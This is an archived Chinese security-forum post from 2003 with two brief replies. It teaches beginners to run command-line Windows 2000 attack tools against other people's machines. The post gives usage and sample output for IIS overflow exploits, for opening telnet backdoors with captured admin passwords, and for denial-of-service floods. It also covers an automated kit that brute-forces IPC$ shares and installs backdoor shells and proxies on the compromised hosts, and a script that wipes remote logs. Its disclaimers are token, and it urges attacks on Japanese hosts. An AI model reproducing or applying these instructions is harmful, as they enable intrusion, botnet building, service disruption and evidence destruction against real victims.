论坛: 菜鸟乐园 标题: 命令行下常用黑客工具的使用方法及技巧(二) 复制本贴地址    
作者: fjs [fjs]    论坛用户   登录
写这篇文章的目的不是告诉大家怎么去破坏别人机子,只是告诉一些黑客初学者怎么使用这些工具。使用工具不是目的,对国内的网络安全没有多大益处,也不容易提高自身的水平;要提高自身水平,多学些编程技术,掌握一些技术性的原理,以及更深层次的东西。
    请勿用于破坏国内主机,否则后果自负。
    以下工具都是在windows2000下测试的,大部分工具也都是针对Win2K
    以下所提到的工具在国内一些黑客网上都会找到,或者到百度、google里搜索。

1,iz.exe  同上也是Pintf溢出的工具,(也只是对SP1有效)
使用方法如下:iz <主机地址> <WEB服务端口> [sp类型]
例如:iz 10.1.1.2 80 1
其他0表示没安补丁,1表示SP1


3,opentelnet.exe ResumeTelnet.exe 这两个工具OpenTelnet.exe是用来启动远程服务器的Telnet的,Resumetelnet.exe是用来把修改了的配置都返回到默认配置上去,关闭Telnet服务等。 使用这两个程序,你必须先获得管理员密码和帐号,同时服务器开放IPC$共享
假设,我们得到了远程机的管理员用户为fjs,密码为123456
我们打对远程机一个端口99用于telnet上去
用法如下:OpenTelnet.exe \\server <帐号> <密码> <NTLM认证方式> <Telnet端口>
NTLM认证方式有以下几种:
0: 不使用 NTLM 身份验证。
1: 先尝试 NTLM 身份验证。如果失败,再使用用户名和密码。
2: 只使用 NTLM 身份验证。
一般我们都是先用1先的
例如:opentelnet.exe \\10.1.1.2 fjs 123456 1 99  (如果密码为空的话,"")
当出现如下情况下时,说明开启成功
......省略.......
BINGLE!!!Yeah!!
Telnet Port is 99. You can try:"telnet ip 99", to connect the server!
Disconnecting server...Successfully!
好了,说明你成功开启了对方机子的99端口了,这时你可以telnet 10.1.1.2 99上去了,后面知道怎么做了吧。

当然开启了后门之后当然要不用时要关了,就要用到ResumeTelnet.exe,该工具是用来恢复Telnet配置的,并关闭Telnet服务器,它的用法:
ResumeTelnet.exe \\ip <帐号> <密码>
具体怎么用很简单的,这里不说了。



4,ntis.exe 该工具可以用于取得远程服务器的信息,得到netbios信息。
用法如下:ntis.exe [参数] IP
参数有: -w Do Web Service checks only.
        -n Do NetBIOS check only.
例如:ntis.exe -n 10.1.1.2
成功后会在该文件的目录下生成报告,是英文的相信大家都会看得懂,值得一提的是,该工具相当于一个扫描工具X-scan,能扫到除漏洞以外所以东西,而且速度比X-scan快多了。


5,IDQover.exe 该工具用于win2K IDQ溢出攻击程序.有效版本为SP2以前的版本



6,winnuke.exe 该工具用于主要用于135端口的一个漏洞,能使远程主机强制重启动,适用系统为win2K、WinXP。
用法如下:winnuke <IP> [端口] (默认为135可不填)
例如:winnuke 10.1.1.2 135
当出现如下情况时,说明发送成功,对方就等着重启吧
.....省略.....
sending Packets...
Nuked!
if target is XP,try a again! :)
如果是XP系统请输入两次.
成功后,对方机子会出现一个窗口,说什么系统出错,60秒后重启,哈哈,多试他几次,他必定要重装机子了,...切记请勿搞破坏呀


7,关于拒绝服务的几个工具:dos1.exe  syn.exe  xdos.exe 这几个工具有一定的危险性,请勿用于破坏,否则后果自负
用法如下:
dos1.exe:(个人认为该工具威力最大,在测试时10MB网速对100Mb网速时,只有一台机时100MB机就基本会死了。)
例如:dos1 ip
xdos.exe:(威力也相当大,在同速网的情况时对方能马上当机)
xdos <ip> <port> [参数] 参数有:-s -t
例如:xdos 10.1.1.2 80  或:xdos 10.1.1.2 80,139 -t -s *
syn.exe:(当前最流行拒绝服务攻击,测试过,必须有好多台机攻击一台时威力才会显现出来,同等速度下没有基本没影响)
用法如下:syn <sourceIP> <sourceport> <TargetIP> <TargetPort>
例如:syn 10.1.1.1 0 10.1.1.2 80  或:syn 10.1.1.1 80 10.1.1.2 80
这里再介绍几个拒绝服务攻击的工具:

FakePing.exe 介绍:伪造IP进行ICMP攻击的工具,
使用方法:fakeping [欲伪造的IP] [目标IP] <数据包大小>

LAND.exe 介绍:进行LAND洪水攻击的工具,Win32版本。内置DNS解析过程,可以直接输入域名
使用方法: LAND [目标] [端口]
例如:land 10.1.1.2 80
效果极好,谨慎使用,后果自负。

fakeping.exe 用法:fakeping [source] [Dest] {PacketSice}
                          伪造IP    目标    数据包大小(最大60K)
例如:fakeping 10.1.1.1 10.1.1.2 9000 
呵呵,这下对方当机了,数据包尽量设最大,如果你数据包设小的话,你自己机的CPU资源占用也很高的。

agyping.exe 用法:agyping [Dest] <PacketSize> <type> <code>
例如:agyping 10.1.1.2 1024  (个人认为该工具威力不是很大,数据包要设成最大效果才最好)

以上所说的拒绝服务攻击都是在宽带网下测试的,如果您是拔号上网的话,这些东西就没什么威力了,当然你可以入侵宽带网的机子,用那台机对其他机进行拒绝服务攻击,

注意:拒绝服务攻击的破坏力极大,请勿用于破坏国内主机,对付小日本好了。



8,autohack 自动收集肉鸡工具,包括自动入侵的部分,而且速度是网上现在能找到的IPC批量入侵的N倍。该工具对于刚入道学习的黑客是最好的工具了,不过建议不要使用该工具,因为太容易使用,功能强大,用了后都不愿意去用其他工具。
包含文件:
2002-09-01  00:57                3,921 clog.vbs EVA写的清理日志的脚本
2003-03-30  00:55                4,397 IPChack.bat 入侵部分的批处理
2003-01-05  11:52                  499 ipcpass.dic 扫描IPC肉鸡的密码字典
2003-03-25  00:06              26,112 IpcScan.exe IPC肉鸡扫描器,uhhuhy老师的作品,爽,狐狸修改了一点东西
2003-01-05  11:52                  60 ipcuser.dic 扫描IPC肉鸡的用户字典
2002-02-25  15:53              52,224 psexec.exe NT的远程命令程序
2003-02-25  00:38              24,064 rep.exe 命令行下的字符串修改程序
2003-03-25  02:57                    2 tihuan.txt 处理扫描结果必须的文件:(
2003-03-19  16:31              45,056 Service.Dll HOTMAIL老师的后门的DLL文件,你用你的来替换就可以了:)
2003-03-21  10:55              37,275 service.exe HOTMAIL老师的WinEggDropShell后门,你用你的来替换就可以了:)
2003-03-26  02:37              19,968 OpenTelnet.exe refdom老师的开TELNET的工具
2003-03-30  01:13                  929 Autohack.bat 处理扫描和入侵的批处理,主要也是他
2003-01-27  23:07              25,088 WinTcpIp.exe SNAKE老师的代理跳板程序,改了个名字而已:)
2003-03-30  01:08                  376 myJJ.txt 狐狸测试时的肉鸡^_^
2003-03-30  01:14                    0 readme.txt 你在看啊
使用方法如下:
例如: Autohack.bat StartIP EndIP  或:Autohack.bat -f hosts.txt  (-f hosts.txt 读取指定的IP列表进行扫描和入侵:StartIP EndIP 扫描开始和结束的IP)
入侵成功后如下:
IP 10.1.0.219 USER Administrator PASS ""
IP 10.1.0.117 USER Administrator PASS ""
10.1.0.117 Snake Socks5 Proxy Intsall OK
10.1.0.117 WinEggDropShell Install OK
10.1.0.117 Open Telnet Service on port 8500
10.1.0.219 Snake Socks5 Proxy Intsall OK
10.1.0.219 WinEggDropShell Install OK
10.1.0.219 Open Telnet Service on port 8500
这里我解释下:把到IP为10.1.0.219,10.1.0.117密码为空,Snake Socks5 Proxy Intsall OK(snake的一个代理工具安装成功)
WinEggDropShell Install OK(什么东东,我还没用过,不好意思,你们自己看看) Open Telnet Service on port 8500,打开了8500端口了,这时你可以telnet上去了。



9,clean.bat 说了这么多入侵的,居然忘了清除日志。这是红衣刺客用批处理编写的一个远程日志清除程序,可以远程清除win2000的所有日志。
但真正能不能百分之百清除并不能肯定,最好手动清除好了。
包含文件:
readme.txt 就是你在看这个的啦。
psexec.exe NT的远程执行工具
clean.bat 呵呵,就是这个程序啦
del.bat 辅助批处理脚本
使用方法:
clean.bat 肉鸡的IP 肉鸡的ADMIN组的用户 用户的密码
例如:clean.bat 10.1.1.2 fjs 123456


10, webdave.exe  这是近来比较火的一个IIS远程溢出程序,有好几个版本,基本用法都一样,但是这个远程溢成的成功率好像很小用法如下:wbedav <IP> <远程端口> <溢出端口>  成功后你可以telnet上去,




作者:FJS  E-mail:fjsabc@163.com  QQ:23762216    2003年8月29日


地主 发表时间: 09/10 18:40
回复: tianyecool [tianyecool]   论坛用户   登录
o

B1层 发表时间: 09/10 18:50
回复: fjs [fjs]   论坛用户   登录
嗯,好久没来了

B2层 发表时间: 12/14 16:07

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号